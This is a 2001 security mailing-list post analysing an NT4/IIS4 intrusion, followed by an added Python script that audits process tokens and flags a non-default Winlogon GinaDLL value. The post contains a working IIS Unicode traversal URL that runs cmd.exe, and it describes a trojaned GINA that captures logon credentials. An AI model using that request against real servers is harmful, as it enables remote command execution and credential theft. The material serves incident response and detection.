Security Incidents mailing list archives
Re: Some details in a recent NT hack we encountered
From: Matt Scarborough <vexversa () USA NET>
Date: Sun, 25 Feb 2001 15:18:08 EST
On Wed, 28 Feb 2001 21:48:23 +0000, Gossi The Dog <gossi () OWNED LAB6 COM> wrote:
> First off, the IIS unicode exploit does not give you SYSTEM or Administrator privs. So how are they getting those (they'll need them to make those dirs and set permissions etc).
Using David LeBlanc's DumpTokenInfo, which "dumps the information from a process token," view the output below. Any misinterpretation of Mr. LeBlanc's code is my fault, not his.

Understanding Process Tokens
http://www.windowsitsecurity.com/Articles/Index.cfm?ArticleID=15989

When I say default below, I mean you grab the floppies and install NT4 and grab the Option Pack and install IIS4. Sadly, this happens too often. And then this default box gets plugged into the Internet.

Default IIS4 is on default NT4 at 192.168.1.65.

C:\INETPUB\SCRIPTS\TEST.CMD is

    CMD /C "DumpTokenInfo.exe >dump.txt"

we do from some other box

    http://192.168.1.65/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+test

and then view the contents of C:\INETPUB\SCRIPTS\DUMP.TXT

    Token Owner: ANTARCTICA\IUSR_ANTARCTICA - User
    Token Primary Group: ANTARCTICA\None - Group
    Token Default DACL:
    Access Allowed for: ANTARCTICA\IUSR_ANTARCTICA - User  All access
    Access Allowed for: NT AUTHORITY\SYSTEM - Well-known group  All access
    Token Source: IIS
    Token type: Primary Token
    Token is not an impersonation token
> Secondly, what program is generating those WinLogon logs? Not seen that before at all, very interesting.
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
    "GinaDLL"
    Type: REG_SZ
    Data: newgina.dll

NewGina.DLL replaces MSGina.DLL with a hacked (to say the least) version. As such, activities like the SAS (CTRL+ALT+DEL) are passed by WinLogon as WlxLoggedOnSAS to the rogue NewGina.DLL. Usernames and passwords for local logons could be saved to a file or E-mailed to an attacker across the globe.
> erm, eek.
Exactly.

Matt
2001-02-25
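The two artifacts Matt shows are exactly what an incident responder would check on a suspect IIS4/NT4 box: whose token the web server's CGI context actually runs under, and whether the Winlogon GinaDLL value points at anything other than the stock msgina.dll. The script below is an added example written for this archive page; it is not code from Matt, Gossi, or David LeBlanc's DumpTokenInfo. It parses a DumpTokenInfo-style dump (the sample text is constructed to match the output quoted in the post) and a `reg export`-style fragment of the Winlogon key (also constructed), and flags the findings. The function and constant names are this example's own, and the optional live read uses the standard-library `winreg` module, which only exists on Windows.

```python
"""Audit helpers for the two artifacts discussed in the thread (added example)."""
import re
from typing import Dict, List, Optional, Tuple

# Constructed sample: DumpTokenInfo-style output, modelled on the post's dump.txt.
SAMPLE_TOKEN_DUMP = """\
Token Owner: ANTARCTICA\\IUSR_ANTARCTICA - User
Token Primary Group: ANTARCTICA\\None - Group
Token Default DACL:
Access Allowed for: ANTARCTICA\\IUSR_ANTARCTICA - User All access
Access Allowed for: NT AUTHORITY\\SYSTEM - Well-known group All access
Token Source: IIS
Token type: Primary Token
Token is not an impersonation token
"""

# Constructed sample: a registry export of the Winlogon key with a non-default GINA.
SAMPLE_REG_EXPORT = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"DefaultDomainName"="ANTARCTICA"
"GinaDLL"="newgina.dll"
"""

WINLOGON_KEY = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
EXPECTED_GINA = "msgina.dll"          # stock GINA; Winlogon uses it when GinaDLL is absent
PRIVILEGED_OWNERS = {"NT AUTHORITY\\SYSTEM", "BUILTIN\\Administrators"}


def parse_token_dump(text: str) -> Dict[str, object]:
    """Pull the owner, source and default-DACL entries out of a DumpTokenInfo dump."""
    info: Dict[str, object] = {"owner": None, "source": None, "dacl": []}
    dacl: List[Tuple[str, str]] = info["dacl"]  # type: ignore[assignment]
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("Token Owner:"):
            # "ANTARCTICA\IUSR_ANTARCTICA - User" -> keep the principal, drop the kind
            info["owner"] = line.split(":", 1)[1].strip().rsplit(" - ", 1)[0]
        elif line.startswith("Token Source:"):
            info["source"] = line.split(":", 1)[1].strip()
        elif line.startswith("Access Allowed for:"):
            principal, rights = line.split(":", 1)[1].strip().rsplit(" - ", 1)
            dacl.append((principal, rights))
    return info


def token_is_privileged(info: Dict[str, object]) -> bool:
    """True when the process token's owner is SYSTEM or Administrators."""
    return info.get("owner") in PRIVILEGED_OWNERS


def gina_from_reg_export(text: str) -> Optional[str]:
    """Return the GinaDLL value under the Winlogon key, or None if it is not set."""
    in_key = False
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            in_key = line[1:-1].lower() == WINLOGON_KEY.lower()
            continue
        if in_key:
            m = re.match(r'^"GinaDLL"="(.*)"$', line, re.IGNORECASE)
            if m:
                return m.group(1)
    return None


def audit_gina(text: str, allowed: Tuple[str, ...] = (EXPECTED_GINA,)) -> str:
    """Classify the configured GINA; `allowed` lets a site whitelist a legitimate
    third-party GINA (for example a directory-services client) by file name."""
    value = gina_from_reg_export(text)
    if value is None:
        return "ok: GinaDLL not set, Winlogon loads the built-in msgina.dll"
    name = value.replace("/", "\\").rsplit("\\", 1)[-1].lower()
    if name in {a.lower() for a in allowed}:
        return f"ok: GinaDLL set to an allowed GINA ({value})"
    return (f"ALERT: non-default GINA '{value}' configured; Winlogon will load it "
            "and hand it every SAS/logon (WlxLoggedOnSAS etc.), so it sees credentials")


def read_gina_live() -> Optional[str]:
    """Read the live GinaDLL value on a Windows host (None when absent or not on Windows)."""
    try:
        import winreg  # Windows-only standard-library module
        key = winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE,
                             r"SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon")
        value, _ = winreg.QueryValueEx(key, "GinaDLL")
        return str(value)
    except (ImportError, FileNotFoundError, OSError):
        return None


if __name__ == "__main__":
    info = parse_token_dump(SAMPLE_TOKEN_DUMP)
    print("CGI token owner:", info["owner"], "(source", info["source"] + ")",
          "privileged" if token_is_privileged(info) else "not privileged")
    print(audit_gina(SAMPLE_REG_EXPORT))
```

Run on the constructed samples, the first check confirms Matt's point: the token IIS hands the CGI process is owned by IUSR_ANTARCTICA, not SYSTEM, even though SYSTEM appears in the token's default DACL. The second check raises an alert on `newgina.dll`; on a real host, `read_gina_live()` feeds the same classification, and anything not on the site's allow list deserves the same "erm, eek" the thread gives it.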
Current thread:
- Some details in a recent NT hack we encountered Ron Grove (Feb 24)
- Re: Some details in a recent NT hack we encountered Gossi The Dog (Feb 24)
- <Possible follow-ups>
- Re: Some details in a recent NT hack we encountered Matt Scarborough (Feb 25)
- Re: Some details in a recent NT hack we encountered Gossi The Dog (Feb 26)
- Re: Some details in a recent NT hack we encountered Matt Scarborough (Feb 25)
- Re: Some details in a recent NT hack we encountered Ron Grove (Feb 25)
- Re: Some details in a recent NT hack we encountered Matt Scarborough (Feb 26)
- Re: Some details in a recent NT hack we encountered Matt Scarborough (Feb 27)
- Re: Some details in a recent NT hack we encountered Gossi The Dog (Feb 28)